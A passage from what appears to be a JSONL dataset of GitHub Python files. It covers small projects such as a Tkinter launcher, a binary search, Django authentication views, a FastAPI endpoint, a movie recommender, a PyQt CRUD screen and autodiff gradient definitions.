encoding=encoding)\n return v\n\n def clear(self, priority='p5'):\n self._queue.delete(priority)\n\n\n# In[]\nif __name__ == '__main__':\n mq = MessageQueue()\n mq.clear()\n mq.put('12')\n mq.put('14')\n mq.put('16')\n v = mq.get(block=True)\n print(v)\n","repo_name":"yulincoder/Controller-Device","sub_path":"device-connection/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"39483689144","text":"import Tkinter as tk\nimport cv2\nimport numpy\n\nclass GUI(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n\n bF = tk.Frame(self, bd=8, relief='sunken')\n bF.pack(expand='true', fill='x')\n Button1 = tk.Button(bF, text='Basic', bd=4, fg='white',relief='groove', activebackground='green',command=self.basic)\n Button1.pack()\n Button2 = tk.Button(bF, text='Email', bd=4, fg='white',relief='groove', activebackground='green',command=self.Email)\n Button2.pack()\n Button3 = tk.Button(bF, text='parking', bd=4, fg='white',relief='groove', activebackground='green',command=self.SMS)\n Button3.pack() \n\n def basic(self):\n execfile('/home/pi/project/project1.py')\n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyAllWindows\n\n def Email(self):\n execfile('/home/pi/project/project2.py') \n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyAllWindows\n def SMS(self):\n \n execfile('/home/pi/project/project4.py')\n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyAllWindows\n \ngui = GUI()\ngui.mainloop()\n","repo_name":"Tesseract-coder/Kunal-Work","sub_path":"gui1.py","file_name":"gui1.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1039648296","text":"\ndef binary_Search(arr, target):\n low = 0\n high = len(arr) - 1\n mid = 0\n while (low <= high):\n mid = (high + low) // 2\n if target == arr[mid]:\n return mid\n elif target < arr[mid]:\n high = mid - 1\n elif target > arr[mid]:\n low = mid + 1\n else:\n return mid\n return -1\n\narr = [1,1,3,4,5]\n\nx = 5\nkq = binary_Search(arr, x)\n\nif kq == -1:\n print('khong tim thay') \nelse:\n print('O vi tri: ', str(kq))","repo_name":"CongSon01/Data-Structures-and-Algrorithms","sub_path":"Algorithms/Search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35417011873","text":"# Diccionario de datos del usuari\r\n# Importar las librerias/Bibliotecas\r\nimport datetime\r\nfrom pathlib import Path\r\nimport UtilidadesSystem as util\r\nimport EstadoSystemCreate as estados\r\nimport PeliculaTipoSystemCreate as peliTipo\r\nimport GeneroPelSystemCreate as genPel\r\nimport CalificacionPelSystemCreate as calif\r\nimport ActoresSystemCreate as actores\r\nimport DirectorSystemCreate as directores\r\nimport ProductoraSystemCreate as productora\r\n\r\nfl_ruta_file = Path(\"C:/System_VideoClub/Peliculas.txt\")\r\n\r\n# Estructura de diccionario\r\nDcc_PeliSystem = {\r\n \"Id_Pelicula\": \"\",\r\n \"Nombre\": \"\",\r\n \"Id_PeliTipo\": \"\",\r\n \"Id_PelGenero\": \"\",\r\n \"Id_PelClasifica\": \"\",\r\n \"Id_Actor\": \"\",\r\n \"Id_Director\": \"\",\r\n \"Id_Productora\": \"\",\r\n \"Id_Estado\": \"\",\r\n \"Fecha_Ingreso\": \"\"\r\n}\r\n\r\n\r\n# ***********************************\r\n# Arranca el sistema\r\n# Pedimos al usuario del sistema ingresar los datos del nueva\r\n# pelicula del sistema.\r\ndef registrarDatos():\r\n print(\"Ingrese los datos del nueva pelicula: \")\r\n for clave in Dcc_PeliSystem:\r\n if format(clave) == \"Id_Pelicula\":\r\n print(f\"{clave}:___\")\r\n valor = \"\"\r\n elif format(clave) == \"Id_PeliTipo\":\r\n dcc_peliTipo = util.recuperarDatos(peliTipo.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_peliTipo, \"Id_PeliTipo\")\r\n elif format(clave) == \"Id_PelGenero\":\r\n dcc_pelGenero = util.recuperarDatos(genPel.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_pelGenero, \"Id_PelGenero\")\r\n elif format(clave) == \"Id_PelClasifica\":\r\n dcc_calif = util.recuperarDatos(calif.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_calif, \"Id_PelClasifica\")\r\n elif format(clave) == \"Id_Actor\":\r\n dcc_actor = util.recuperarDatos(actores.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_actor, \"Id_Actor\", \"Nombres_Apellidos\")\r\n elif format(clave) == \"Id_Director\":\r\n dcc_director = util.recuperarDatos(directores.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_director, \"Id_Director\")\r\n elif format(clave) == \"Id_Productora\":\r\n dcc_productora = util.recuperarDatos(productora.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_productora, \"Id_Productora\")\r\n elif format(clave) == \"Id_Estado\":\r\n dcc_estados = util.recuperarDatos(estados.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_estados, \"Id_Estado\", \"Nombre\")\r\n elif format(clave) == \"Fecha_Ingreso\":\r\n valor = datetime.datetime.now()\r\n else:\r\n valor = input(\"{}: \".format(clave))\r\n Dcc_PeliSystem[clave] = valor\r\n\r\n while True:\r\n Lv_Guardar = str(input(\"Desea guardar los datos de la pelicula (S/N): \")).upper()\r\n if Lv_Guardar == \"S\":\r\n print(\"Procesando...\")\r\n # Proceso de almacenamiento\r\n # Recuperamos la secuencia de los registros guardados\r\n Ln_SenccReg = util.Prc_ContrSecuencia(\"PeliculaSystem\")\r\n # Salvo el registro dentro del file del archivo\r\n with open(fl_ruta_file, \"a\") as archivoUser:\r\n Linea = \"Pelicula\" + str(Ln_SenccReg) + \":\"\r\n for clave, valor in Dcc_PeliSystem.items():\r\n if format(clave) == \"Id_Pelicula\":\r\n valor = str(Ln_SenccReg)\r\n Linea += f\"{clave}={valor},\"\r\n Linea = Linea.rstrip(\",\") + \"\\n\"\r\n archivoUser.write(Linea)\r\n # Actualizar la secuencia de los registros\r\n Lv_Guardar = util.Prc_UpdateSecuencia(\"PeliculaSystem\", Ln_SenccReg)\r\n if Lv_Guardar == \"SI\":\r\n print(\"La secuencia de los registros de peliculas fue actualizada\")\r\n else:\r\n print(\"La secuencia no fue actualizada, notifique a sistema.\")\r\n break\r\n elif Lv_Guardar == \"N\":\r\n # Cancelamos el proceso de crear un nuevo usuario\r\n print(\"Proceso cancelado.\")\r\n break\r\n else:\r\n print(\"Opción no valida.\")","repo_name":"aterana3/Proyecto-3er-semestre","sub_path":"PeliculaSystemCreate.py","file_name":"PeliculaSystemCreate.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13820981623","text":"from datetime import date\nimport re\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\n\nclass Transaction(BaseModel):\n date: date\n description: str\n amount: str\n\n\nclass Merchant(BaseModel):\n name: str\n\n\napp = FastAPI()\n\ndef normalize_merchant_heuristic(tx: Transaction) -> Merchant:\n \"\"\"\n Please do not focus on the implementation of this heuristic.\n For the purpose of the exercise, we will assume that the heuristic is already\n implemented with the code below. We are looping over the regex on purpose to\n reflect the slowness of a real-world implementation.\n \"\"\"\n match = None\n for _ in range(20_000_000):\n match = re.search(\"Netflix\", tx.description)\n\n if match:\n return Merchant(name=\"Netflix\")\n else:\n return Merchant(name=\"n/a\")\n\n\n@app.post(\"/normalize_merchant\")\nasync def normalize_merchant(tx: Transaction):\n merchant = normalize_merchant_heuristic(tx)\n return merchant\n","repo_name":"HarithJ/fastapi-async-tasks","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29408135518","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.messages import constants\nfrom django.contrib import auth\n\nimport re\n\n# libs send email\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom django.conf import settings\n\n\ndef cadastro(request):\n if request.method == 'GET':\n if request.user.is_authenticated:\n return redirect('/')\n return render(request, 'cadastro.html')\n elif request.method == 'POST':\n username = request.POST.get('username')\n email = request.POST.get('email')\n senha = request.POST.get('senha')\n confirmar_senha = request.POST.get('confirmar_senha')\n \n #captcha\n captcha = request.POST.get('captcha')\n re_captcha = request.POST.get('re_captcha')\n \n if len(username.strip()) == 0 or len(email.strip()) == 0 or len(senha.strip()) == 0:\n messages.add_message(request, constants.ERROR,\n 'Preencha todos os campos')\n return redirect('/auth/cadastro')\n elif re.findall(username.lower(), senha.lower()):\n messages.add_message(request, constants.ERROR,\n 'Senha não pode ser igual ao usuario')\n return redirect('/auth/cadastro')\n \n elif re.findall('123', senha) or re.findall('234', senha) or re.findall('345', senha) or re.findall('456', senha) or re.findall('567', senha) or re.findall('678', senha) or re.findall('789', senha):\n messages.add_message(request, constants.ERROR,\n 'Senha não pode ter uma sequencia numérica')\n return redirect('/auth/cadastro')\n \n elif senha != confirmar_senha:\n messages.add_message(request, constants.ERROR,\n 'As senhas digitadas não são iguais!')\n return redirect('/auth/cadastro')\n \n elif len(senha.strip()) <= 5:\n messages.add_message(request, constants.ERROR,\n 'A senha tem que ter no minimo 6 caracteres e ao menos um caracter especial')\n return redirect('/auth/cadastro')\n \n elif re.search('[,.;@/]', senha.strip()) == None:\n messages.add_message(request, constants.ERROR,\n 'A senha tem que ter no minimo 6 caracteres e ao menos um caracter especial (@ / . , ;)')\n return redirect('/auth/cadastro')\n \n elif captcha != re_captcha:\n messages.add_message(request, constants.ERROR,\n 'Erro de CAPTCHA!')\n return redirect('/auth/cadastro')\n \n elif len(captcha.strip()) == 0 and len(re_captcha.strip()) == 0:\n messages.add_message(request, constants.ERROR,\n 'Erro de CAPTCHA!')\n return redirect('/auth/cadastro')\n \n user = User.objects.filter(username=username)\n email_filter = User.objects.filter(email=email)\n \n if user.exists():\n messages.add_message(request, constants.ERROR,\n 'Já existe um usuario com esse nome cadastrado')\n return redirect('/auth/cadastro')\n \n #deu certo\n if email_filter.exists():\n messages.add_message(request, constants.ERROR,\n 'Esse email já foi cadastrado')\n return redirect('/auth/cadastro')\n \n try:\n user = User.objects.create_user(username=username,\n email=email,\n password=senha)\n user.save()\n\n messages.add_message(request, constants.SUCCESS,\n 'Usuário cadastrado com sucesso!')\n\n # Send E-mail\n html_content = render_to_string('emails/cadastro_confirmado.html')\n text_content = strip_tags(html_content)\n\n email_send = EmailMultiAlternatives(\n 'Cadastro Confirmado', text_content, settings.EMAIL_HOST_USER, [email])\n email_send.attach_alternative(html_content, 'text/html')\n email_send.send()\n\n return redirect('/auth/logar')\n except:\n messages.add_message(request, constants.ERROR,\n 'Erro interno do sistema')\n return redirect('/auth/cadastro')\n\n\ndef logar(request):\n if request.method == 'GET':\n if request.user.is_authenticated:\n return redirect('/home.html')\n return render(request, 'logar.html')\n elif request.method == 'POST':\n username = request.POST.get('username')\n senha = request.POST.get('senha')\n\n usuario = auth.authenticate(username=username, password=senha)\n if not usuario:\n messages.add_message(request, constants.ERROR,\n 'Usuário ou senha inválidos')\n return redirect('/auth/logar')\n else:\n auth.login(request, usuario)\n \n # Send e-mail\n html_content = render_to_string('emails/promo_imovel.html')\n text_content = strip_tags(html_content)\n\n email_send = EmailMultiAlternatives(\n 'Bem vindo ao ImobiBR', text_content, settings.EMAIL_HOST_USER, [usuario.email])\n email_send.attach_alternative(html_content, 'text/html')\n email_send.send()\n return redirect('/home')\n\n\ndef sair(request):\n auth.logout(request)\n return redirect('/auth/logar')\n\n\ndef handler404(request, exception):\n return render(request, 'status_code/not_found.html')\n\n\ndef handler500(request):\n return render(request, 'status_code/server_error.html')","repo_name":"satoosan/ImobiBR","sub_path":"imobi/autenticacao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"25862763856","text":"import logging\n__version__ = '1.2.7'\n\ngearauthsite = \"ga.netpie.io\"\ngearapiport = '8080';\ngearapisecureport = '8081';\ngbport = '1883';\ngbsport = '8883';\n\nmgrev = \"PY11k\"\ngearkey = None\ngearsecret = None\ngearalias = None\nappid = None\ngearname = None\naccesstoken = None\nrequesttoken = None\nclient = None\nscope = \"\"\ngearexaddress = None\ngearexport = None\nmqtt_client = None\nlogger = logging.getLogger(\"python-microgear\")\nsecuremode = False\nstate = False\n","repo_name":"netpie2015/microgear-python","sub_path":"microgear/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"44"} +{"seq_id":"21725196841","text":"\n\nimport sys \nimport matplotlib.pyplot as plt\nimport pandas as pd \n\nfile_path = r'C:\\Users\\sasad\\Desktop\\github\\nz_gov_data\\liabilities_equities_assets'\nsys.path.append(file_path)\n\nfrom total_assets import lowest_api \n\ndef display_highest_total_assets(lpi: pd.Series) -> None:\n \n industry = lpi.index.tolist()\n assets = lpi.values.tolist()\n\n shorten_names = [\n 'Public Order, Safety',\n 'Education and Training',\n 'Healthcare',\n 'Media and Telecommunications',\n 'Arts, Recreation'\n ]\n\n industry[:] = [x for x in shorten_names]\n\n line_color = '#D83A56'\n color = '#0E185F'\n bg_color = '#C9EEFF'\n text_color = '#FF5677'\n\n fig, ax = plt.subplots()\n plt.bar(industry, assets, color = color)\n\n fig.patch.set_facecolor(bg_color)\n ax.set_facecolor(bg_color)\n\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_color(color)\n ax.spines['left'].set_color(color)\n\n plt.suptitle(\n 'NEW ZEALAND LOWEST TOTAL ASSETS PER INDUSTRY 2013-2021',\n fontfamily = 'Bahnschrift',\n fontsize = 18,\n color = text_color\n )\n\n plt.title(\n '*source https://www.data.govt.nz/',\n fontfamily = 'Bahnschrift',\n color = text_color\n )\n\n plt.ylabel(\n 'ASSETS (in millions of NZ Dollars)',\n fontfamily = 'Bahnschrift',\n fontsize = 12.5,\n color = text_color\n )\n\n plt.xlabel(\n 'INDUSTRY NAME',\n fontfamily = 'Bahnschrift',\n fontsize = 12.5,\n color = text_color\n )\n\n plt.xticks(color=color)\n plt.yticks(color=color)\n\n for index, value in enumerate(assets):\n plt.text(\n index,\n value, \n str(value),\n ha = 'center',\n position = (index, value-7_500),\n fontweight = 'bold',\n color = 'w',\n fontsize = 15\n )\n\n plt.show()\n\ndisplay_highest_total_assets(lowest_api)\n\n","repo_name":"sasadjukic/nz_gov_data","sub_path":"liabilities_equities_assets/assets_charts/lowest_total_assets_per_industry.py","file_name":"lowest_total_assets_per_industry.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19485403486","text":"from __future__ import absolute_import\n\nimport tensorflow as tf\nfrom . import lib\nfrom . import utils\nimport numpy as np\n\ndef _load_graph(model_file):\n graph = tf.Graph()\n graph_def = tf.compat.v1.GraphDef()\n with open(model_file, \"rb\") as f:\n graph_def.ParseFromString(f.read())\n with graph.as_default():\n tf.import_graph_def(graph_def)\n return graph\n\nclass NazoruPredictor():\n def __init__(self, model_file):\n graph = _load_graph(model_file)\n self._graph = graph\n self._input_operation = graph.get_operation_by_name(\n 'import/' + lib.INPUT_NODE_NAME)\n self._output_operation = graph.get_operation_by_name(\n 'import/' + lib.OUTPUT_NODE_NAME)\n\n def _predict(self, data):\n with utils.Measure('inputs'):\n inputs = lib.keydowns2image(data, True, True, 16, 2)\n inputs = np.expand_dims(inputs, axis=0)\n with utils.Measure('sess.run'):\n with tf.compat.v1.Session(graph=self._graph) as sess:\n result = sess.run(self._output_operation.outputs[0],\n {self._input_operation.outputs[0]: inputs})[0]\n return result\n def predict_top_n(self, data, n):\n \"\"\"Predict the charactor drawn by |data|.\n\n Args:\n data: [(key, time)] |time| is elapsed time since the first character in ms.\n n: integer of the number of the return value.\n Returns:\n ans: [(kana, key, probability)] sorted by the probability.\n \"\"\"\n result = self._predict(data)\n ans = []\n for i in result.argsort()[::-1][:n]:\n ans.append((lib.KANAS[i], lib.KEYS[i], result[i]))\n return ans\n","repo_name":"google/mozc-devices","sub_path":"mozc-nazoru/src/nazoru/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1830,"dataset":"github-code","pt":"44"} +{"seq_id":"8747305290","text":"# %%\n\n# Re-evalute the policies after the optimization of the worst-case scenarios\n\n'''\n After having optimized based on the worst-case scenarios we continue with the re-evaluation of the policies.\n'''\nif __name__ == '__main__':\n import pandas as pd\n\n# read the results of the optimization(step5)\nresults = []\nfor i in range(3):\n read_results= pd.read_csv(\"intermediate outputs/step5 - multi scenario optimization results/step5 - \" + str(i) + \" optimization results.csv\")\n results.append(read_results)\n\n\n# concatenate the results in a Dataframe\ntpm = pd.concat([results[0], results[1]])\ntpm = pd.concat([tpm, results[2]])\ntpm\n\n\n# %%\nimport numpy as np\n\nlogical = (tpm['A.4_Expected Number of Deaths'] < 0.01) & (tpm['A.5_Expected Number of Deaths'] < 0.01) & (tpm['Other.Dikes_Expected Number of Deaths'] < 0.01)\nres = np.sum(logical) / len(tpm)\nprint(res * 100)\nprint(np.sum(logical))\n\n\n# %%\nselected = tpm[logical]\n\n\n# %%\nselected['Dike 4 & 5 - Total deaths'] = selected[\"A.4_Expected Number of Deaths\"] + selected[\"A.5_Expected Number of Deaths\"]\n\n\n# %%\nfor q in [25, 50, 75]:\n logical = selected['Dike 4 & 5 - Total deaths'] < np.percentile(selected['Dike 4 & 5 - Total deaths'], q)\n print(f'Policies kept: {np.sum(logical)}')\n print(f'% Policies kept: {np.sum(logical)/len(results) * 100}')\n print()\n\n\n# %%\nlogical = selected['Dike 4 & 5 - Total deaths'] < np.percentile(selected['Dike 4 & 5 - Total deaths'], q)\n\n\n# %%\nperc = np.percentile(selected['Dike 4 & 5 - Total deaths'], 25)\n\n\n# %%\nperc\n\n\n# %%\ncount = 0\nfor result in results:\n result['Dike 4 & 5 - Total deaths'] = result[\"A.4_Expected Number of Deaths\"] + result[\"A.5_Expected Number of Deaths\"]\n logical = (result['Dike 4 & 5 - Total deaths'] < perc) & (result['Other.Dikes_Expected Number of Deaths'] < 0.01)\n count += np.sum(logical)\nprint(count)\n\n\n# %%\nfinal_results=[]\nfor result in results:\n result['Dike 4 & 5 - Total deaths'] = result[\"A.4_Expected Number of Deaths\"] + result[\"A.5_Expected Number of Deaths\"]\n logical = (result['Dike 4 & 5 - Total deaths'] < perc) & (result['Other.Dikes_Expected Number of Deaths'] < 0.01)\n final_results.append(result[logical])\n\n\n# %%\nlen(final_results[0]) + len(final_results[2]) + len(final_results[1])\n\n\n# %%\nfrom ema_workbench import Policy, MultiprocessingEvaluator\nfrom problem_formulation import get_model_for_problem_formulation\n\n# create the dike_model\nproblem_formulation = 6 # WARNING: use the same PF as the ones that you used to create the results csv file!\ndike_model, planning_steps = get_model_for_problem_formulation(problem_formulation)\n\n\npolicies = []\nto_drop = []\n\nfor i, result in enumerate(final_results):\n for column in final_results[i].columns: #we keep only the levers\n to_drop.append(column)\n for o in dike_model.levers:\n to_drop.remove(o.name)\n\n result = result.drop([column for column in to_drop], axis=1);\n for j, row in result.iterrows():\n policy = Policy(f'scenario {i} option {j}', **row.to_dict())\n policies.append(policy)\n\n\n# %%\nlen(policies)\n\n\n# %%\nimport time, pickle\n#run the experiments\nstart_time = time.time()\nprint('Runtime started')\n\nfrom ema_workbench import ema_logging\nema_logging.log_to_stderr(ema_logging.INFO)\n\nwith MultiprocessingEvaluator(dike_model) as evaluator:\n experiments,outcomes = evaluator.perform_experiments(100, policies=policies)\n\nend_time = time.time()\nprint('Runtime ended with duration of', str(end_time - start_time))\n\n\n#save the results\nexperiments.to_csv(\"intermediate outputs/step6 - second re-evaluation - experiments description.csv\")\n\n# save the outcomes to a pickle file (outcomes is a dictionary)\na_file = open(\"intermediate outputs/step6 - second re-evaluation - outcomes description.pkl\", \"wb\")\npickle.dump(outcomes, a_file)\na_file.close()\n# to read back our dictionary: https://www.adamsmith.haus/python/answers/how-to-save-a-dictionary-to-a-file-in-python\n\n\n","repo_name":"LudovicaBindi/MBDM-Final_Project","sub_path":".ipynb_checkpoints/final_step6_second_reevaluate_policies-checkpoint.py","file_name":"final_step6_second_reevaluate_policies-checkpoint.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42929390844","text":"import pandas as pd\nfrom sklearn.metrics.pairwise import linear_kernel\n# from gensim.models import\nfrom scipy.io import mmread, mmwrite\nimport pickle\n\ndf_review_1stcs = pd.read_csv('./crawling/one_sentences_review_2018~2021.csv', index_col=0)\n# print(df_review_1stcs.info())\n# print(df_review_1stcs.head())\n\n\n' enumerate'\nls = '겨울왕국 라이온킹 알라딘'.split()\nprint(list(enumerate(ls)))\n\n\nexit()\n# TF-IDF matrix load / TF-IDF load\ntfidf_matrix = mmread('./models/tfidf_movie_review.mtx').tocsr()\nwith open('./models/tfidf.pickle', 'rb') as f:\n tfidf = pickle.load(f)\n\n\n\ndef getRcommendation(cosine_sim):\n simScore = list(enumerate(cosine_sim[-1]))\n simScore = sorted(simScore, key=lambda x : x[1], reverse=True)\n simScore = simScore[1:10] # 0은 self\n movieidx = [i[0] for i in simScore]\n recMovieList = df_review_1stcs.iloc[movieidx, 0] # row indexing\n return recMovieList\n\n\n\n# 영화의 index 탐색\nmovie_idx = df_review_1stcs[df_review_1stcs['titles']=='기생충 (PARASITE)'].index[0]\n\n# 또는 index를 직접 지정해서 사용 가능\n# movie_idx = 300\n# 영화 제목 확인\nprint(df_review_1stcs.iloc[movie_idx, 0])\n\ncosine_sim = linear_kernel(tfidf_matrix[movie_idx], tfidf_matrix)\nrecommendation = getRcommendation(cosine_sim)\nprint(recommendation)","repo_name":"forhow/Movie4U","sub_path":"PRJ02_movie4you/movie_rcmd_sys.py","file_name":"movie_rcmd_sys.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1281578997","text":"def is_leap_year(year):\n if year%1000 == 0:\n return True\n elif year%100 == 0:\n return False\n elif year%4 == 0:\n return True\n else:\n return False\n\ncurrent_year = int(input(\"Enter current year: \"))\nfinal_year = int(input(\"Enter final year: \"))\n\nfor year in range(current_year, final_year+1):\n if is_leap_year(year):\n print(year)\n","repo_name":"pranavkaruvally/programming-lab","sub_path":"cycle1/leap_year.py","file_name":"leap_year.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6596405502","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom src.views.update_page import UpdatePage\nfrom src.views.read_page import ReadPage\nfrom src.views.delete_page import DeletePage\nfrom src.views.create_page import CreatePage\n\n\nclass CRUDScreen(QtWidgets.QWidget):\n def __init__(self, parent=None, controller=None):\n super(CRUDScreen, self).__init__(parent)\n self.controller = controller\n self.setup_ui()\n\n def setup_ui(self):\n self.setObjectName(\"self\")\n self.resize(685, 475)\n font = QtGui.QFont()\n font.setFamily(\"Times New Roman\")\n font.setPointSize(12)\n self.setFont(font)\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout()\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.verticalLayout = QtWidgets.QVBoxLayout()\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout.addItem(spacerItem)\n self.label = QtWidgets.QLabel(self)\n self.label.setMinimumSize(QtCore.QSize(100, 0))\n self.label.setObjectName(\"label\")\n self.horizontalLayout.addWidget(self.label)\n self.current_table_box = QtWidgets.QComboBox(self)\n self.current_table_box.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.current_table_box.setMinimumSize(QtCore.QSize(150, 0))\n self.current_table_box.setObjectName(\"current_table_box\")\n self.horizontalLayout.addWidget(self.current_table_box)\n self.verticalLayout.addLayout(self.horizontalLayout)\n self.CRUDPages = QtWidgets.QTabWidget(self)\n self.CRUDPages.setObjectName(\"CRUDPages\")\n self.create_page = CreatePage(self)\n self.create_page.setObjectName(\"create_page\")\n self.CRUDPages.addTab(self.create_page, \"\")\n self.update_page = UpdatePage(self)\n self.update_page.setObjectName(\"update_page\")\n self.CRUDPages.addTab(self.update_page, \"\")\n self.delete_page = DeletePage(self)\n self.delete_page.setObjectName(\"delete_page\")\n self.CRUDPages.addTab(self.delete_page, \"\")\n self.read_page = ReadPage()\n self.read_page.setObjectName(\"read_page\")\n self.CRUDPages.addTab(self.read_page, \"\")\n self.verticalLayout.addWidget(self.CRUDPages)\n self.verticalLayout_2.addLayout(self.verticalLayout)\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_2.addItem(spacerItem1)\n self.back_menu = QtWidgets.QPushButton(self)\n self.back_menu.setMinimumSize(QtCore.QSize(100, 25))\n self.back_menu.setMaximumSize(QtCore.QSize(100, 16777215))\n self.back_menu.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.back_menu.setCheckable(False)\n self.back_menu.setObjectName(\"back_menu\")\n self.horizontalLayout_2.addWidget(self.back_menu)\n self.verticalLayout_2.addLayout(self.horizontalLayout_2)\n self.verticalLayout_3.addLayout(self.verticalLayout_2)\n\n self.retranslateUi()\n self.CRUDPages.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(self)\n\n def retranslateUi(self):\n _translate = QtCore.QCoreApplication.translate\n self.setWindowTitle(_translate(\"self\", \"Form\"))\n self.label.setText(_translate(\"self\", \"Current table\"))\n self.CRUDPages.setTabText(self.CRUDPages.indexOf(self.create_page), _translate(\"self\", \"Create\"))\n self.CRUDPages.setTabText(self.CRUDPages.indexOf(self.update_page), _translate(\"self\", \"Update\"))\n self.CRUDPages.setTabText(self.CRUDPages.indexOf(self.delete_page), _translate(\"self\", \"Delete\"))\n self.CRUDPages.setTabText(self.CRUDPages.indexOf(self.read_page), _translate(\"self\", \"Read\"))\n self.back_menu.setText(_translate(\"self\", \"Back to menu\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n\n ui = CRUDScreen()\n ui.setup_ui()\n ui.show()\n sys.exit(app.exec_())\n","repo_name":"Proxypepe/mini_dbms_gui","sub_path":"src/views/crud_frame.py","file_name":"crud_frame.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4918905366","text":"from minitf import kernel as K\nfrom minitf.autodiff.vjp_maker import def_vjp_maker\n\n\n# Stolen from autograd library\ndef unbroadcast(target, g):\n while K.rank(g) > K.rank(target):\n g = K.reduce_sum(g, axis=0)\n for axis, size in enumerate(K.shape(target)):\n if size == 1:\n g = K.reduce_sum(g, axis=axis, keepdims=True)\n return g\n\n\ndef balanced_eq(x, z, y):\n return (x == z) / (1.0 + (x == y))\n\n\ndef_vjp_maker(K.add, lambda ans, x, y: (\n lambda g: unbroadcast(x, g),\n lambda g: unbroadcast(y, g),\n))\n\ndef_vjp_maker(K.subtract, lambda ans, x, y: (\n lambda g: unbroadcast(x, g),\n lambda g: unbroadcast(y, -g),\n))\n\ndef_vjp_maker(K.multiply, lambda ans, x, y: (\n lambda g: unbroadcast(x, y * g),\n lambda g: unbroadcast(y, x * g),\n))\n\ndef_vjp_maker(K.divide, lambda ans, x, y: (\n lambda g: unbroadcast(x, g / y),\n lambda g: unbroadcast(y, -g * x / (y * y)),\n))\n\ndef_vjp_maker(K.dot, lambda ans, x, y: (\n lambda g: K.dot(g, K.transpose(y)),\n lambda g: K.dot(K.transpose(x), g),\n))\n\ndef_vjp_maker(K.square, lambda ans, x: (\n lambda g: g * 2 * x,\n))\n\n# Need to update.\ndef_vjp_maker(K.reduce_mean, lambda ans, x: (\n lambda g: g / K.size(x),\n))\n\ndef_vjp_maker(K.exp, lambda ans, x: (\n lambda g: ans * g,\n))\n\ndef_vjp_maker(K.negative, lambda ans, x: (\n lambda g: -g,\n))\n\ndef_vjp_maker(K.transpose, lambda ans, x: (\n lambda g: K.transpose(g),\n))\n\ndef_vjp_maker(K.maximum, lambda ans, x, y: (\n lambda g: unbroadcast(x, g * balanced_eq(x, ans, y)),\n lambda g: unbroadcast(y, g * balanced_eq(y, ans, x)),\n))\n\ndef_vjp_maker(K.minimum, lambda ans, x, y: (\n lambda g: unbroadcast(x, g * balanced_eq(x, ans, y)),\n lambda g: unbroadcast(y, g * balanced_eq(y, ans, x)),\n))\n\ndef_vjp_maker(K.cast, lambda ans, x, dtype: (\n 